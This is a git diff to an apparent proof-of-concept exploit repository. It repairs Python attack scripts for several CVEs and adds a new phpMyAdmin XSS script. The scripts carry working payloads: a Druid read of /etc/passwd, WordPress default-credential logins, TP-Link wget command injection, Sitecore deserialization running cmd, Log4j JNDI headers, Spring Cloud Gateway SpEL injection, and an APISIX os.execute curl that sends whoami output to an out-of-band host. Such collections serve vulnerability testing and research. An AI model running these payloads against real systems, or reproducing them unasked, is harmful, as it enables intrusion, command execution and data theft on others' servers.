diff --git a/2021/CVE-2021-36749/poc/pocsploit/CVE-2021-36749.py b/2021/CVE-2021-36749/poc/pocsploit/CVE-2021-36749.py
index 68e43d2e2..35b69979f 100644
--- a/2021/CVE-2021-36749/poc/pocsploit/CVE-2021-36749.py
+++ b/2021/CVE-2021-36749/poc/pocsploit/CVE-2021-36749.py
@@ -1,4 +1,5 @@
 import requests
+import re
 
 
 # Vuln Base Info
@@ -39,9 +40,9 @@ def poc(url):
 
         path = """/druid/indexer/v1/sampler?for=connect"""
         method = "POST"
-        data = """{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"http","uris":[" file:///etc/passwd "]}},"dataSchema":{"dataSource":"sample","parser":{"type":"string", "parseSpec":{"format":"regex","pattern":"(.*)","columns":["a"],"dimensionsSpec":{},"timestampSpec":{"column":"no_ such_ column","missingValue":"2010-01-01T00:00:00Z"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}"""
+        data = {"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"http","uris":[" file:///etc/passwd "]}},"dataSchema":{"dataSource":"sample","parser":{"type":"string", "parseSpec":{"format":"regex","pattern":"(.*)","columns":["a"],"dimensionsSpec":{},"timestampSpec":{"column":"no_ such_ column","missingValue":"2010-01-01T00:00:00Z"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}
         headers = {'Content-Type': 'application/json'}
-        resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         if (re.search(r"""root:.*:0:0:""",resp0.text) or re.search(r"""druid:*:1000:1000:""",resp0.text)):
             result["success"] = True
diff --git a/2021/CVE-2021-39322/poc/pocsploit/CVE-2021-39322.py b/2021/CVE-2021-39322/poc/pocsploit/CVE-2021-39322.py
index bd6cb0c77..58dbf72c0 100644
--- a/2021/CVE-2021-39322/poc/pocsploit/CVE-2021-39322.py
+++ b/2021/CVE-2021-39322/poc/pocsploit/CVE-2021-39322.py
@@ -33,6 +33,8 @@ def fingerprint(url):
 # Proof of Concept
 def poc(url):
     result = {}
+    username = "admin"
+    password = "admin"
     try:
         url = format_url(url)
 
@@ -40,7 +42,7 @@ def poc(url):
 
         path = """/wp-login.php"""
         method = "POST"
-        data = """log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1"""
+        data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
         headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
         resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2021/CVE-2021-39350/poc/pocsploit/CVE-2021-39350.py b/2021/CVE-2021-39350/poc/pocsploit/CVE-2021-39350.py
index 9ffddd15a..d48e14e92 100644
--- a/2021/CVE-2021-39350/poc/pocsploit/CVE-2021-39350.py
+++ b/2021/CVE-2021-39350/poc/pocsploit/CVE-2021-39350.py
@@ -33,6 +33,8 @@ def fingerprint(url):
 # Proof of Concept
 def poc(url):
     result = {}
+    username = "admin"
+    password = "admin"
     try:
         url = format_url(url)
 
@@ -40,7 +42,7 @@ def poc(url):
 
         path = """/wp-login.php"""
         method = "POST"
-        data = """log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1"""
+        data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
         headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
         resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2021/CVE-2021-41266/poc/pocsploit/CVE-2021-41266.py b/2021/CVE-2021-41266/poc/pocsploit/CVE-2021-41266.py
index 25d3ec424..fd9a6de18 100644
--- a/2021/CVE-2021-41266/poc/pocsploit/CVE-2021-41266.py
+++ b/2021/CVE-2021-41266/poc/pocsploit/CVE-2021-41266.py
@@ -39,9 +39,9 @@ def poc(url):
 
         path = """/api/v1/login/oauth2/auth"""
         method = "POST"
-        data = """{"code":"test","state":"test"}"""
+        data = {"code":"test","state":"test"}
         headers = {'Accept': '*/*', 'Content-Type': 'application/json'}
-        resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         if (resp0.status_code == 201 or resp0.status_code == 200) and ("""sessionId""" in resp0.text) and ("""token""" in str(resp0.headers)):
             result["success"] = True
diff --git a/2021/CVE-2021-41653/poc/pocsploit/CVE-2021-41653.py b/2021/CVE-2021-41653/poc/pocsploit/CVE-2021-41653.py
index 4a9a44dad..87b9c6d8f 100644
--- a/2021/CVE-2021-41653/poc/pocsploit/CVE-2021-41653.py
+++ b/2021/CVE-2021-41653/poc/pocsploit/CVE-2021-41653.py
@@ -47,9 +47,9 @@ def poc(url):
 dataBlockSize=64
 timeout=1
 numberOfRepetitions=4
-host=$(echo 127.0.0.1; wget http://oob_domain)
+host=$(echo 127.0.0.1; wget http://{oob_domain})
 X_TP_ConnName=ewan_ipoe_d
-diagnosticsState=Requested"""
+diagnosticsState=Requested""".format(oob_domain=oob_domain)
         headers = {'Content-Type': 'text/plain', 'Referer': 'http://{{Hostname}}/mainFrame.htm', 'Cookie': 'Authorization=Basic YWRtaW46YWRtaW4='}
         resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2021/CVE-2021-4191/poc/pocsploit/CVE-2021-4191.py b/2021/CVE-2021-4191/poc/pocsploit/CVE-2021-4191.py
index be89a007f..b756509d3 100644
--- a/2021/CVE-2021-4191/poc/pocsploit/CVE-2021-4191.py
+++ b/2021/CVE-2021-4191/poc/pocsploit/CVE-2021-4191.py
@@ -39,9 +39,9 @@ def poc(url):
 
         path = """/api/graphql"""
         method = "POST"
-        data = """{"query":"# Welcome to GraphiQL\n#\n# GraphiQL is an in-browser tool for writing, validating, and\n# testing GraphQL queries.\n#\n# Type queries into this side of the screen, and you will see intelligent\n# typeaheads aware of the current GraphQL type schema and live syntax and\n# validation errors highlighted within the text.\n#\n# GraphQL queries typically start with a \"{\" character. Lines that starts\n# with a # are ignored.\n#\n# An example GraphQL query might look like:\n#\n#     {\n#       field(arg: \"value\") {\n#         subField\n#       }\n#     }\n#\n# Keyboard shortcuts:\n#\n#  Prettify Query:  Shift-Ctrl-P (or press the prettify button above)\n#\n#       Run Query:  Ctrl-Enter (or press the play button above)\n#\n#   Auto Complete:  Ctrl-Space (or just start typing)\n#\n\n{\n  users {\n    nodes {\n      id\n      name\n      username\n    }\n  }\n}","variables":null,"operationName":null}"""
+        data = {"query":"# Welcome to GraphiQL\n#\n# GraphiQL is an in-browser tool for writing, validating, and\n# testing GraphQL queries.\n#\n# Type queries into this side of the screen, and you will see intelligent\n# typeaheads aware of the current GraphQL type schema and live syntax and\n# validation errors highlighted within the text.\n#\n# GraphQL queries typically start with a \"{\" character. Lines that starts\n# with a # are ignored.\n#\n# An example GraphQL query might look like:\n#\n#     {\n#       field(arg: \"value\") {\n#         subField\n#       }\n#     }\n#\n# Keyboard shortcuts:\n#\n#  Prettify Query:  Shift-Ctrl-P (or press the prettify button above)\n#\n#       Run Query:  Ctrl-Enter (or press the play button above)\n#\n#   Auto Complete:  Ctrl-Space (or just start typing)\n#\n\n{\n  users {\n    nodes {\n      id\n      name\n      username\n    }\n  }\n}","variables":None,"operationName":None}
         headers = {'Content-Type': 'application/json', 'Accept': '*/*'}
-        resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         if ("""data""" in resp0.text and """users""" in resp0.text and """nodes""" in resp0.text and """id""" in resp0.text and """gid://""" in resp0.text) and (resp0.status_code == 200):
             result["success"] = True
diff --git a/2021/CVE-2021-42237/poc/pocsploit/CVE-2021-42237.py b/2021/CVE-2021-42237/poc/pocsploit/CVE-2021-42237.py
index c3af63e79..350f83f6c 100644
--- a/2021/CVE-2021-42237/poc/pocsploit/CVE-2021-42237.py
+++ b/2021/CVE-2021-42237/poc/pocsploit/CVE-2021-42237.py
@@ -108,14 +108,14 @@ def poc(url):
                 <Items z:Id="24" z:Type="System.String[]" z:Assembly="0" z:Size="2"
                     xmlns="">
                     <string z:Id="25"
-                        xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">/c nslookup oob_domain</string>
+                        xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">/c nslookup {oob_domain}</string>
                     <string z:Id="26"
                         xmlns="http://schemas.microsoft.com/2003/10/Serialization/Arrays">cmd</string>
                 </Items>
             </ArrayOfstring>
         </parameter>
     </parameters>
-</a>"""
+</a>""".format(oob_domain=oob_domain)
         headers = {'Content-Type': 'text/xml'}
         resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2021/CVE-2021-45046/poc/pocsploit/CVE-2021-45046.py b/2021/CVE-2021-45046/poc/pocsploit/CVE-2021-45046.py
index 30ad7ba4d..5f59f8583 100644
--- a/2021/CVE-2021-45046/poc/pocsploit/CVE-2021-45046.py
+++ b/2021/CVE-2021-45046/poc/pocsploit/CVE-2021-45046.py
@@ -41,10 +41,10 @@ def poc(url):
 
         oob_domain,flag = gen_oob_domain()
 
-        path = """/?x=${jndi:ldap://127.0.0.1#.${hostName}.oob_domain/a}"""
+        path = """/?x=${jndi:ldap://127.0.0.1#.${hostName}.%s/a}""" % oob_domain
         method = "GET"
         data = """"""
-        headers = {'Accept': '${jndi:ldap://127.0.0.1#.${hostName}.accept.oob_domain}', 'Accept-Encoding': '${jndi:ldap://127.0.0.1#.${hostName}.acceptencoding.oob_domain}', 'Accept-Language': '${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.oob_domain}', 'Access-Control-Request-Headers': '${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.oob_domain}', 'Access-Control-Request-Method': '${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.oob_domain}', 'Authentication': 'Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.oob_domain}', 'Cookie': '${jndi:ldap://127.0.0.1#.${hostName}.cookiename.oob_domain}=${jndi:ldap://${hostName}.cookievalue.oob_domain}', 'Location': '${jndi:ldap://127.0.0.1#.${hostName}.location.oob_domain}', 'Origin': '${jndi:ldap://127.0.0.1#.${hostName}.origin.oob_domain}', 'Referer': '${jndi:ldap://127.0.0.1#.${hostName}.referer.oob_domain}', 'Upgrade-Insecure-Requests': '${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.oob_domain}', 'User-Agent': '${jndi:ldap://127.0.0.1#.${hostName}.useragent.oob_domain}', 'X-Api-Version': '${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.oob_domain}', 'X-CSRF-Token': '${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.oob_domain}', 'X-Druid-Comment': '${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.oob_domain}', 'X-Forwarded-For': '${jndi:ldap://127.0.0.1#.${hostName}.xforwardedfor.oob_domain}', 'X-Origin': '${jndi:ldap://127.0.0.1#.${hostName}.xorigin.oob_domain}'}
+        headers = {'Accept': '${jndi:ldap://127.0.0.1#.${hostName}.accept.%s}' % oob_domain, 'Accept-Encoding': '${jndi:ldap://127.0.0.1#.${hostName}.acceptencoding.%s}' % oob_domain, 'Accept-Language': '${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.%s}' % oob_domain, 'Access-Control-Request-Headers': '${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.%s}' % oob_domain, 'Access-Control-Request-Method': '${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.%s}' % oob_domain, 'Authentication': 'Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.%s}' % oob_domain, 'Cookie': '${jndi:ldap://127.0.0.1#.${hostName}.cookiename.%s}=${jndi:ldap://${hostName}.cookievalue.%s}'  % (oob_domain, oob_domain), 'Location': '${jndi:ldap://127.0.0.1#.${hostName}.location.%s}' % oob_domain, 'Origin': '${jndi:ldap://127.0.0.1#.${hostName}.origin.%s}' % oob_domain, 'Referer': '${jndi:ldap://127.0.0.1#.${hostName}.referer.%s}' % oob_domain, 'Upgrade-Insecure-Requests': '${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.%s}' % oob_domain, 'User-Agent': '${jndi:ldap://127.0.0.1#.${hostName}.useragent.%s}' % oob_domain, 'X-Api-Version': '${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.%s}' % oob_domain, 'X-CSRF-Token': '${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.%s}' % oob_domain, 'X-Druid-Comment': '${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.%s}' % oob_domain, 'X-Forwarded-For': '${jndi:ldap://127.0.0.1#.${hostName}.xforwardedfor.%s}' % oob_domain, 'X-Origin': '${jndi:ldap://127.0.0.1#.${hostName}.xorigin.%s}' % oob_domain}
         resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         if verify_request(type="dns", flag=flag):
diff --git a/2022/CVE-2022-0149/poc/pocsploit/CVE-2022-0149.py b/2022/CVE-2022-0149/poc/pocsploit/CVE-2022-0149.py
index 9501b15bc..e8a505645 100644
--- a/2022/CVE-2022-0149/poc/pocsploit/CVE-2022-0149.py
+++ b/2022/CVE-2022-0149/poc/pocsploit/CVE-2022-0149.py
@@ -33,6 +33,8 @@ def fingerprint(url):
 # Proof of Concept
 def poc(url):
     result = {}
+    username = "admin"
+    password = "admin"
     try:
         url = format_url(url)
 
@@ -40,7 +42,7 @@ def poc(url):
 
         path = """/wp-login.php"""
         method = "POST"
-        data = """log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1"""
+        data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
         headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
         resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
diff --git a/2022/CVE-2022-22947/poc/pocsploit/CVE-2022-22947.py b/2022/CVE-2022-22947/poc/pocsploit/CVE-2022-22947.py
index 79b3188e6..48d949ba5 100644
--- a/2022/CVE-2022-22947/poc/pocsploit/CVE-2022-22947.py
+++ b/2022/CVE-2022-22947/poc/pocsploit/CVE-2022-22947.py
@@ -1,4 +1,6 @@
 import requests
+import random
+import string
 from plugins.oob import verify_request, gen_oob_domain
 
 
@@ -38,56 +40,56 @@ def fingerprint(url):
 # Proof of Concept
 def poc(url):
     result = {}
+    randstr = gen_random_str(10)
     try:
         url = format_url(url)
 
         oob_domain,flag = gen_oob_domain()
 
-        path = """/actuator/gateway/routes/{{randstr}}"""
+        path = """/actuator/gateway/routes/%s""" % randstr
         method = "POST"
-        data = """{
-  "predicates": [
-    {
-      "name": "Path",
-      "args": {
-        "_genkey_0": "/{{randstr}}/**"
-      }
-    }
-  ],
-  "filters": [
-    {
-      "name": "RewritePath",
-      "args": {
-        "_genkey_0": "#{T(java.net.InetAddress).getByName(\"oob_domain\")}",
-        "_genkey_1": "/${path}"
-      }
-    }
-  ],
-  "uri": "{{RootURL}}",
-  "order": 0
-}"""
+        data = {
+            "predicates": [
+              {
+                "name": "Path",
+                "args": {
+                  "_genkey_0": "/%s/**" % randstr
+                }
+              }
+            ],
+            "filters": [
+              {
+                "name": "RewritePath",
+                "args": {
+                  "_genkey_0": "#{T(java.net.InetAddress).getByName(\"%s\")}" % oob_domain,
+                  "_genkey_1": "/${path}"
+                }
+              }
+            ],
+            "uri": url,
+            "order": 0
+        }
         headers = {'Content-Type': 'application/json'}
-        resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         path = """/actuator/gateway/refresh"""
         method = "POST"
-        data = """{
-  "predicate": "Paths: [/{{randstr}}], match trailing slash: true",
-  "route_id": "{{randstr}}",
-  "filters": [
-    "[[RewritePath #{T(java.net.InetAddress).getByName(\"oob_domain\")} = /${path}], order = 1]"
-  ],
-  "uri": "{{RootURL}}",
-  "order": 0
-}"""
+        data = {
+            "predicate": "Paths: [/%s], match trailing slash: true" % randstr,
+            "route_id": "%s" % randstr,
+            "filters": [
+              "[[RewritePath #{T(java.net.InetAddress).getByName(\"%s\")} = /${path}], order = 1]" % oob_domain
+            ],
+            "uri": url,
+            "order": 0
+        }
         headers = {'Content-Type': 'application/json'}
-        resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp1 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
-        path = """/actuator/gateway/routes/{{randstr}}"""
+        path = """/actuator/gateway/routes/%s""" % randstr
         method = "DELETE"
-        data = """"""
         headers = {}
-        resp2 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp2 = requests.request(method=method,url=url+path,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         if verify_request(type="dns", flag=flag):
             result["success"] = True
@@ -112,4 +114,7 @@ def format_url(url):
         url = 'http://' + url
     url = url.rstrip('/')
 
-    return url
\ No newline at end of file
+    return url
+
+def gen_random_str(length):
+    return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(length))
\ No newline at end of file
diff --git a/2022/CVE-2022-23808/poc/pocsploit/CVE-2022-23808.py b/2022/CVE-2022-23808/poc/pocsploit/CVE-2022-23808.py
new file mode 100644
index 000000000..d0ea412a1
--- /dev/null
+++ b/2022/CVE-2022-23808/poc/pocsploit/CVE-2022-23808.py
@@ -0,0 +1,72 @@
+import requests
+
+
+# Vuln Base Info
+def info():
+    return {
+        "author": "cckuailong",
+        "name": '''phpMyAdmin < 5.1.2 - XSS''',
+        "description": '''An issue was discovered in phpMyAdmin 5.1 before 5.1.2. An attacker can inject malicious code into aspects of the setup script, which can allow XSS or HTML injection.''',
+        "severity": "medium",
+        "references": [
+            "https://mp.weixin.qq.com/s/c2kwxwVUn1ym7oqv9Uio_A",
+            "https://github.com/dipakpanchal456/CVE-2022-23808",
+            "https://nvd.nist.gov/vuln/detail/CVE-2022-23808"
+        ],
+        "classification": {
+            "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
+            "cvss-score": "6.1",
+            "cve-id": "CVE-2022-23808",
+            "cwe-id": "CWE-79"
+        },
+        "metadata":{
+            "vuln-target": "https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-23808/vultarget"
+        },
+        "tags": ["phpmyadmin", "unauth" , "xss"],
+    }
+
+
+# Vender Fingerprint
+def fingerprint(url):
+    url = format_url(url)
+    resp = requests.get(url, timeout=10, verify=False)
+    if "<title>phpMyAdmin</title>" in resp.text or "pma_password" in resp.text or "Set-Cookie: phpMyAdmin=" in str(resp.headers) or "realm=\"phpMyAdmin" in str(resp.headers):
+        return True
+    else:
+        return False
+
+# Proof of Concept
+def poc(url):
+    result = {}
+    try:
+        url = format_url(url)
+
+        path = "/setup/index.php?page=servers&mode=test&id=\">'><script>alert(document.domain)</script>"
+        method = "GET"
+        headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36"}
+        resp = requests.request(method=method,url=url+path,headers=headers,timeout=10,verify=False,allow_redirects=False)
+
+        if resp.status_code == 200 and 'text/html' in str(resp.headers) and "\">'><script>alert(document.domain)</script>" in resp.text:
+            result["success"] = True
+            result["info"] = info()
+            result["payload"] = url+path
+
+    except:
+        result["success"] = False
+    
+    return result
+
+
+# Exploit, can be same with poc()
+def exp(url):
+    return poc(url)
+
+
+# Utils
+def format_url(url):
+    url = url.strip()
+    if not ( url.startswith('http://') or url.startswith('https://') ):
+        url = 'http://' + url
+    url = url.rstrip('/')
+
+    return url
\ No newline at end of file
diff --git a/2022/CVE-2022-23808/poc/pocsploit/wait_to_be_added b/2022/CVE-2022-23808/poc/pocsploit/wait_to_be_added
deleted file mode 100644
index 08b178987..000000000
--- a/2022/CVE-2022-23808/poc/pocsploit/wait_to_be_added
+++ /dev/null
@@ -1 +0,0 @@
-Please contibute to implement this poc / vultarget, thanks!
diff --git a/2022/CVE-2022-23944/poc/pocsploit/CVE-2022-23944.py b/2022/CVE-2022-23944/poc/pocsploit/CVE-2022-23944.py
index f0bcc70ad..4e8f07a00 100644
--- a/2022/CVE-2022-23944/poc/pocsploit/CVE-2022-23944.py
+++ b/2022/CVE-2022-23944/poc/pocsploit/CVE-2022-23944.py
@@ -7,7 +7,7 @@ def info():
         "author": "cckuailong",
         "name": '''ShenYu Admin Unauth Access''',
         "description": '''User can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1.''',
-        "severity": "medium",
+        "severity": "critical",
         "references": [
             "https://github.com/apache/incubator-shenyu/pull/2462/files", 
             "https://nvd.nist.gov/vuln/detail/CVE-2022-23944"
diff --git a/2022/CVE-2022-24112/poc/pocsploit/CVE-2022-24112.py b/2022/CVE-2022-24112/poc/pocsploit/CVE-2022-24112.py
index bde99e8ec..d63db1e4e 100644
--- a/2022/CVE-2022-24112/poc/pocsploit/CVE-2022-24112.py
+++ b/2022/CVE-2022-24112/poc/pocsploit/CVE-2022-24112.py
@@ -1,4 +1,6 @@
 import requests
+import random
+import string
 from plugins.oob import verify_request, gen_oob_domain
 
 
@@ -14,16 +16,17 @@ def info():
             "https://nvd.nist.gov/vuln/detail/CVE-2022-24112", 
             "https://www.openwall.com/lists/oss-security/2022/02/11/3", 
             "https://twitter.com/sirifu4k1/status/1496043663704858625", 
-            "https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests"
+            "https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests",
+            "https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-24112/vultarget"
         ],
         "classification": {
             "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
-            "cvss-score": "",
+            "cvss-score": "9.8",
             "cve-id": "CVE-2022-24112",
             "cwe-id": "CWE-290"
         },
         "metadata":{
-            "vuln-target": "",
+            "vuln-target": "https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-24112/vultarget",
             "shodan-query":'''title:"Apache APISIX Dashboard"''',
             "fofa-query":'''title="Apache APISIX Dashboard"''',
             "product":'''https://apisix.apache.org'''
@@ -39,6 +42,7 @@ def fingerprint(url):
 # Proof of Concept
 def poc(url):
     result = {}
+    randstr = gen_randstr(10)
     try:
         url = format_url(url)
 
@@ -46,28 +50,27 @@ def poc(url):
 
         path = """/apisix/batch-requests"""
         method = "POST"
-        data = """{
-  "headers":{
-    "X-Real-IP":"127.0.0.1",
-    "Content-Type":"application/json"
-  },
-  "timeout":1500,
-  "pipeline":[
-    {
-      "method":"PUT",
-      "path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1",
-      "body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/{{randstr}}\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl https://oob_domain/`whoami`'); return true end\"}"
-    }
-  ]
-}"""
+        data = {
+            "headers":{
+                "X-Real-IP":"127.0.0.1",
+                "Content-Type":"application/json"
+            },
+            "timeout":1500,
+            "pipeline":[
+                {
+                "method":"PUT",
+                "path":"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1",
+                "body":"{\r\n \"name\": \"test\", \"method\": [\"GET\"],\r\n \"uri\": \"/api/%s\",\r\n \"upstream\":{\"type\":\"roundrobin\",\"nodes\":{\"httpbin.org:80\":1}}\r\n,\r\n\"filter_func\": \"function(vars) os.execute('curl http://%s/`whoami`'); return true end\"}" % (randstr, oob_domain)
+                }
+            ]
+        }
         headers = {'Content-Type': 'application/json', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'zh-CN,zh;q=0.9'}
-        resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
-        path = """//oob_domain/`whoami`\'); return true end\\"}"\n    }\n  ]\n}\n', 'GET /api/{{randstr}}"""
+        path = """/api/%s""" % (randstr)
         method = "GET"
-        data = """"""
         headers = {'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'zh-CN,zh;q=0.9'}
-        resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+        resp1 = requests.request(method=method,url=url+path,headers=headers,timeout=10,verify=False,allow_redirects=False)
 
         if verify_request(type="dns", flag=flag):
             result["success"] = True
@@ -92,4 +95,7 @@ def format_url(url):
         url = 'http://' + url
     url = url.rstrip('/')
 
-    return url
\ No newline at end of file
+    return url
+
+def gen_randstr(length):
+    return ''.join(random.sample(string.ascii_letters + string.digits, length))
\ No newline at end of file
diff --git a/2022/CVE-2022-24112/vultarget/5.png b/2022/CVE-2022-24112/vultarget/5.png
new file mode 100644
index 000000000..a11f29164
Binary files /dev/null and b/2022/CVE-2022-24112/vultarget/5.png differ
diff --git a/2022/CVE-2022-24112/vultarget/README.md b/2022/CVE-2022-24112/vultarget/README.md
index 0c8fc3306..f6e3c80b6 100644
--- a/2022/CVE-2022-24112/vultarget/README.md
+++ b/2022/CVE-2022-24112/vultarget/README.md
@@ -22,6 +22,10 @@ creat a service
 
 ## Poc
 
-[](../poc/nuclei/CVE-2022-24112.yaml)
+[Poc1](../poc/nuclei/CVE-2022-24112.yaml)
 
 ![](4.png)
+
+[Poc2](../poc/pocsploit/CVE-2022-24112.py)
+
+![](5.png)